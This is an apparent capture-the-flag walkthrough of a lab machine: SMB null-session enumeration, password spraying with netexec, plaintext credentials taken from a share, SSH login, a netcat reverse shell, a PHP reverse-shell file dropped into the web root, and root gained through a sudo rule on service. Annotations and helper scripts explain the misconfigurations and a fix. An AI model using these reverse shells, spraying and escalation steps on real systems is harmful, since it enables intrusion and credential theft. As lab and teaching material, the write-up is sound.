
Allien

export TARGET_IP=172.17.0.2
sudo nmap -p0- $TARGET_IP
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds

SMB Enumeration

Share Enumeration with smbclient

We use smbclient to interact with the SMB service. Let's attempt an anonymous connection to list available shares:

smbclient -L //$TARGET_IP -N
  • -L: Lists services available on the server.
  • -N: Suppresses the password prompt, attempting a null session.

Results:

Anonymous login successful

Sharename Type Comment
--------- ---- -------
myshare Disk Carpeta compartida sin restricciones
backup24 Disk Privado
home Disk Produccion
IPC$ IPC IPC Service (EseEmeB Samba Server)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 172.17.0.2 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

We can list the shares anonymously, which is a misconfiguration in itself: a null session should not be able to enumerate shares. The share comments (in Spanish) are telling: myshare is "shared folder without restrictions", backup24 is "private" and home is "production". IPC$ is the standard inter-process communication share that every Samba server exposes. The SMB1 errors that follow only mean the server refuses the legacy protocol smbclient falls back to for workgroup listing; they can be ignored.

Attempting Access to Shares

Let's try to access the backup24 share anonymously:

smbclient //$TARGET_IP/backup24 -N

Results:

Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Oct 6 18:26:40 2024
.. D 0 Sun Oct 6 18:26:40 2024
access.txt N 956 Sun Oct 6 02:46:26 2024
smb: \> get access.txt

get downloads the file into the current local directory. Back in the local shell we read it:

cat access.txt
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.[payload elided].bQhS5qLCv5bf3sy-oHS7ZGcqqjk3LqyJ5bv-Jw6DIIoSIkmBtiocq07F7joOeKRxS3roWdHEuZUMeHQfWTHwRH7pHqCIBVJObdvHI8WR_Gac_MPYvwd6aSAoNExSlZft1-hXJUWbUIZ683JqEg06VYIap0Durih2rUio4Bdzv68JIo_3M8JFMV6kQTHnM3CElKy-UdorMbTxMQdUGKLk_4C7_FLwrGQse1f_iGO2MTzxvGtebQhERv-bluUYGU3Dq7aJCNU_hBL68EHDUs0mNSPF-f_FRtdENILwF4U14PSJiZBS3e5634i9HTmzRhvCGAqY00isCJoEXC1smrEZpg

access.txt holds a JSON Web Token (JWT), the bearer-token format web applications commonly use for authentication. A live token sitting in a share that null sessions can read is a finding on its own. The header decodes to {"alg":"RS256","typ":"JWT"}, and the payload names the satriani7 user with role: user and the domain eseemeb.dl; the writeup decoded it at https://jwt.io/. Two caveats: the claims are readable without any key because base64url is an encoding, not encryption, so reading them proves nothing about who issued the token; and pasting a token found on an engagement into a third-party site hands the credential to that site, so decoding locally is the better habit.
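The decoding done on jwt.io above can be done locally with nothing but base64(1) and sed. The following shell functions are an added example, not part of the original walkthrough: they split a JWT on its dots, restore the base64url padding that the JWT format strips, and print the header and claims. The token embedded in the block is constructed here (an HS256 header, a payload using the claim names sub, role and iss as an assumed shape, and a dummy third segment); the real token's payload is not reproduced.

```shell
# b64url_decode: base64url text -> bytes. JWT segments drop the '=' padding,
# so restore it from the length before handing the string to base64(1).
b64url_decode() {
  s=$(printf '%s' "$1" | tr '_-' '/+')
  case $(( ${#s} % 4 )) in
    2) s="${s}==" ;;
    3) s="${s}=" ;;
  esac
  printf '%s' "$s" | base64 -d
}

# b64url_encode: bytes -> base64url. Only used here to build the sample token.
b64url_encode() {
  printf '%s' "$1" | base64 | tr -d '=\n' | tr '/+' '_-'
}

# jwt_header / jwt_claims decode the first and second dot-separated segments.
# Neither looks at the third segment: nothing here verifies the signature, so
# the claims are what the token says about itself, not what the issuer proved.
jwt_header() { b64url_decode "${1%%.*}"; }
jwt_claims() { rest=${1#*.}; b64url_decode "${rest%%.*}"; }

# jwt_alg: the alg value from the decoded header (RS256 on the token above).
jwt_alg() {
  jwt_header "$1" | sed -n 's/.*"alg"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p'
}

# Constructed sample token (not the one from the share): an HS256 header, a
# payload shaped like the claims the walkthrough describes (claim names are an
# assumption), and a placeholder third segment that is not a real signature.
SAMPLE_TOKEN="$(b64url_encode '{"alg":"HS256","typ":"JWT"}').$(b64url_encode '{"sub":"satriani7","role":"user","iss":"eseemeb.dl"}').$(b64url_encode 'not-a-real-signature')"

jwt_header "$SAMPLE_TOKEN"; echo
jwt_claims "$SAMPLE_TOKEN"; echo
jwt_alg "$SAMPLE_TOKEN"
```

To use it on the real token, pass that string instead of SAMPLE_TOKEN. Decoding is not validation: the functions never look at the signature, so a forged payload decodes exactly as cleanly as a genuine one, and the statement that the token "belongs to" satriani7 rests on what the token asserts, not on the issuer's key.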

User Enumeration with rpcclient

rpcclient is another tool for interacting with SMB services; it speaks MS-RPC over the IPC$ pipe. Its enumdomusers command (a SAMR call) lists the server's user accounts, and a null session is often enough to run it:

rpcclient -U "" -N $TARGET_IP
rpcclient $> enumdomusers
  • -U "": Specifies an empty username for an anonymous connection.

Results:

user:[usuario1] rid:[0x3e8]
user:[usuario3] rid:[0x3ea]
user:[administrador] rid:[0x3ec]
user:[usuario2] rid:[0x3e9]
user:[satriani7] rid:[0x3eb]

We enumerated five local accounts together with their RIDs. Two stand out: administrador (Spanish for administrator, RID 0x3ec) and satriani7 (the subject of the JWT found in backup24, RID 0x3eb).

Exploitation

Brute-Force Attack (netexec)

Knowing the usernames, we can attempt a password-guessing attack. We'll use netexec, the maintained successor of CrackMapExec, which sprays a user list and a password list against SMB much as hydra would. On a real engagement, check the lockout policy before doing this: a full rockyou.txt run against five accounts is many hundreds of thousands of logon attempts.

First, create a text file users.txt containing the enumerated usernames:

satriani7
usuario2
administrador
usuario3
usuario1

Then, execute netexec with a password list (e.g., rockyou.txt):

netexec smb $TARGET_IP -u users.txt -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
  • --ignore-pw-decoding: rockyou.txt contains lines that are not valid UTF-8; without this flag netexec aborts when it fails to decode them, with it those lines are skipped.

Results:

...
SMB 172.17.0.2 445 SAMBASERVER [+] SAMBASERVER\satriani7:50cent
...

Success! We found valid credentials for the user satriani7:

  • Username: satriani7
  • Password: 50cent
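The users.txt above was typed by hand from the rpcclient output, and the valid credential was picked out of the netexec log by eye. The following shell functions are an added example, not from the original walkthrough, that do both mechanically: they parse enumdomusers output into a user list ready for users.txt, pull the Disk shares out of an smbclient -L listing, and extract the [+] hits from netexec output. The sample output embedded in the block is constructed from the lines quoted on this page, plus one assumed [-] failure line in netexec's format; nothing in the block talks to a target.

```shell
# Constructed samples: the rpcclient and netexec lines quoted in the
# walkthrough and an smbclient -L listing in the same shape, embedded so the
# parsers can be exercised offline.
RPC_OUT='user:[usuario1] rid:[0x3e8]
user:[usuario3] rid:[0x3ea]
user:[administrador] rid:[0x3ec]
user:[usuario2] rid:[0x3e9]
user:[satriani7] rid:[0x3eb]'

SMB_OUT='    Sharename       Type      Comment
    ---------       ----      -------
    myshare         Disk      Carpeta compartida sin restricciones
    backup24        Disk      Privado
    home            Disk      Produccion
    IPC$            IPC       IPC Service (EseEmeB Samba Server)'

# The [-] line is an assumed failure line in netexec's usual format.
NXC_OUT='SMB         172.17.0.2      445    SAMBASERVER      [-] SAMBASERVER\satriani7:123456 STATUS_LOGON_FAILURE
SMB         172.17.0.2      445    SAMBASERVER      [+] SAMBASERVER\satriani7:50cent'

# parse_rpc_users: "user:[name] rid:[0x..]" -> "name 0x..", one per line.
parse_rpc_users() {
  sed -n 's/^user:\[\([^]]*\)\] rid:\[\([^]]*\)\].*/\1 \2/p'
}

# user_list: just the names, de-duplicated and sorted, i.e. users.txt.
user_list() {
  parse_rpc_users | cut -d ' ' -f 1 | sort -u
}

# disk_shares: share names whose type is Disk (IPC$ and printers are skipped).
disk_shares() {
  awk '$2 == "Disk" { print $1 }'
}

# netexec_hits: "[+] DOMAIN\user:pass" lines -> "user:pass".
netexec_hits() {
  sed -n 's/.*\[+\] \([^ ]*\).*/\1/p' | sed 's/^[^\\]*\\//'
}

# write_users_file: build a users.txt at the given path from enumdomusers output.
write_users_file() {
  printf '%s\n' "$RPC_OUT" | user_list > "$1"
}

printf '%s\n' "$RPC_OUT" | parse_rpc_users
printf '%s\n' "$SMB_OUT" | disk_shares
printf '%s\n' "$NXC_OUT" | netexec_hits
```

In practice the functions are fed from the tools directly, for example `rpcclient -U "" -N "$TARGET_IP" -c enumdomusers | user_list > users.txt`, and the netexec run is piped through `tee` so that `netexec_hits` can be run over the saved log afterwards.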

Post-Exploitation

Further Enumeration with Valid Credentials

Now that we have valid credentials, we can enumerate the shares again as satriani7 with smbmap, which reports the permissions the authenticated user holds on each share:

smbmap -u 'satriani7' -p '50cent' -H 172.17.0.2

Results:

Disk        Permissions   Comment
----        -----------   -------
myshare     READ ONLY     Carpeta compartida sin restricciones
backup24    READ ONLY     Privado
home        NO ACCESS     Produccion
IPC$        NO ACCESS     IPC Service (EseEmeB Samba Server)

This shows that satriani7 has READ ONLY access to myshare and backup24, but no access to home or IPC$.

Accessing Shares and Retrieving Data

We connect to the backup24 share as satriani7 and browse it. Under Documents\Personal there is a file named credentials.txt, which we download:

smbclient //172.17.0.2/backup24 -U 'satriani7%50cent'
smb: \Documents\Personal\> get credentials.txt

credentials.txt is a plaintext credential record written in Spanish (Usuario = user, Contraseña = password). Its header says the document "exposes user credentials, including the administrator user's", and its closing notes advise keeping the credentials in a safe place, changing the passwords periodically and not sharing them without authorization, advice the file itself violates:

cat credentials.txt
# Archivo de credenciales
Este documento expone credenciales de usuarios, incluyendo la del usuario administrador.
Usuarios:
-------------------------------------------------
1. Usuario: jsmith
- Contraseña: PassJsmith2024!
2. Usuario: abrown
- Contraseña: PassAbrown2024!
3. Usuario: lgarcia
- Contraseña: PassLgarcia2024!
4. Usuario: kchen
- Contraseña: PassKchen2024!
5. Usuario: tjohnson
- Contraseña: PassTjohnson2024!
6. Usuario: emiller
- Contraseña: PassEmiller2024!
7. Usuario: administrador
- Contraseña: Adm1nP4ss2024
8. Usuario: dwhite
- Contraseña: PassDwhite2024!
9. Usuario: nlewis
- Contraseña: PassNlewis2024!
10. Usuario: srodriguez
- Contraseña: PassSrodriguez2024!
# Notas:
- Mantener estas credenciales en un lugar seguro.
- Cambiar las contraseñas periódicamente.
- No compartir estas credenciales sin autorización.

This is a critical finding: a plaintext password file readable by a low-privilege SMB user, listing ten accounts and including the administrador password.

Privilege Escalation

Logging in as administrador

Using the administrador password from credentials.txt (Adm1nP4ss2024), we log in via SSH:

ssh administrador@$TARGET_IP

We are now logged in as administrador. Despite the name, this is an ordinary account on this box: we are not root yet.

Creating a Reverse Shell

Start a Netcat listener on your attacking machine:

nc -lvnp 4444

Then, on the target system, execute the following command:

nc -e /bin/bash <YOUR_ATTACKING_IP> 4444
  • Replace <YOUR_ATTACKING_IP> with the IP address of your attacking machine.
  • -e exists only in netcat builds that support it (traditional netcat, ncat); the OpenBSD netcat shipped by many distributions does not have it, so the command as written assumes the target's build does.

This establishes a reverse shell connection, allowing you to execute commands on the target system from your attacking machine. Since we already hold an SSH session, this step is optional here; it mainly shows how to hand the session to a listener when SSH is not available.

Privilege Escalation

Back in the SSH session, we check what administrador may run with sudo:

sudo -l

administrador has no sudo rules and is not root, so we need another way to escalate our privileges.

Strategy: PHP Reverse Shell in Web Root

A web server is running (port 80 was open in our initial Nmap scan). If the web root is writable by administrador, we can drop a PHP reverse shell there and trigger it with an HTTP request. The resulting shell runs as whatever account the web server runs as (www-data on most Debian-family installs), and that account may hold privileges, sudo rules included, that administrador does not. A web root writable by an unprivileged local user is itself a misconfiguration.

Creating a PHP Reverse Shell

  1. Locate the Web Root:

    First, we need to find the web root directory. Common locations for web roots include:

    • /var/www/html
    • /var/www
    • /usr/local/apache2/htdocs (for Apache)
    • /usr/share/nginx/html (for Nginx)

    We can use the find command to search for likely directories:

    find / -type d -name "html" 2>/dev/null
    find / -type d -name "www" 2>/dev/null

    We find the web root at /var/www/html.

  2. Crafting the PHP Reverse Shell:

    Create the file in the web root (administrador can write there, which is what this step depends on):

    nano /var/www/html/shell.php

    shell.php:

    <?php
    $ip = '<YOUR_ATTACKING_IP>'; // Replace with your attacking machine's IP
    $port = 4444;                // Must match the port your listener is on

    // Connect back to the listener and wire an interactive shell's
    // stdin, stdout and stderr to the socket.
    $sock = fsockopen($ip, $port);
    $proc = proc_open('/bin/sh -i', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
    ?>

    chmod 755 /var/www/html/shell.php

Triggering the Reverse Shell

  1. Start a Netcat Listener:

    On your attacking machine, start a Netcat listener to receive the reverse shell connection:

    nc -lvnp 4444
  2. Execute the Shell:

    Request the script over HTTP, from a browser or with curl (the request hangs for as long as the shell is alive):

    http://$TARGET_IP/shell.php

    If PHP executes the script, a connection appears on the Netcat listener. The shell runs as the web server's user, not as root:

whoami
> www-data

We have a shell as www-data, but we are not finished. Checking what this account may run with sudo:

sudo -l
Matching Defaults entries for www-data on 2880b8b6a0e6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User www-data may run the following commands on 2880b8b6a0e6:
(ALL) NOPASSWD: /usr/sbin/service

https://gtfobins.github.io/gtfobins/service/#sudo

sudo service ../../bin/sh

service(8) executes /etc/init.d/<name> and does not check that <name> is a bare file name, so ../../bin/sh resolves to /bin/sh and runs with the root privileges sudo grants. We are root.
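Why a relative path works here: the service(8) wrapper on Debian-family systems builds the init script path as $SERVICEDIR/$SERVICE from its first argument and runs it, with no check that the argument is a single path component. The following shell block is an added example, not from the original writeup or from GTFOBins: it reproduces that path construction in pure string handling (no filesystem access, so it runs anywhere), shows where ../../bin/sh lands, and adds the validation the wrapper lacks. The default init directory /etc/init.d is assumed.

```shell
# normalize_path: collapse "." and ".." segments the way the kernel would when
# the path is opened, without touching the filesystem.
normalize_path() {
  out=""
  old_ifs=$IFS
  IFS='/'
  set -f                      # no globbing of segments like '*'
  for seg in $1; do
    case $seg in
      ''|.) ;;                # empty (leading/double slash) and "." add nothing
      ..)  out=${out%/*} ;;   # drop the last component; stops at "" (root)
      *)   out="$out/$seg" ;;
    esac
  done
  set +f
  IFS=$old_ifs
  printf '%s\n' "${out:-/}"
}

# resolve_service: what `service NAME` ends up executing when it falls back to
# the SysV path, "$SERVICEDIR/$NAME", with NAME taken as-is. The default
# directory is an assumption about the target.
resolve_service() {
  normalize_path "${2:-/etc/init.d}/$1"
}

# is_safe_service_name: the check the wrapper does not perform. A service name
# must be one path component: no slash, no leading dot, only [A-Za-z0-9_@.-].
is_safe_service_name() {
  case $1 in
    ''|*/*|.*) return 1 ;;
  esac
  printf '%s' "$1" | grep -Eq '^[A-Za-z0-9_@.-]+$'
}

resolve_service ../../bin/sh      # /bin/sh
resolve_service apache2           # /etc/init.d/apache2
is_safe_service_name apache2 && echo 'apache2: accepted'
is_safe_service_name ../../bin/sh || echo '../../bin/sh: rejected'
```

The fix on the sudoers side is not a stricter service(8) but a narrower rule: grant the exact command line that is needed (for example `/usr/sbin/service apache2 restart`) instead of the bare binary, because a NOPASSWD rule on service with free arguments is equivalent to root.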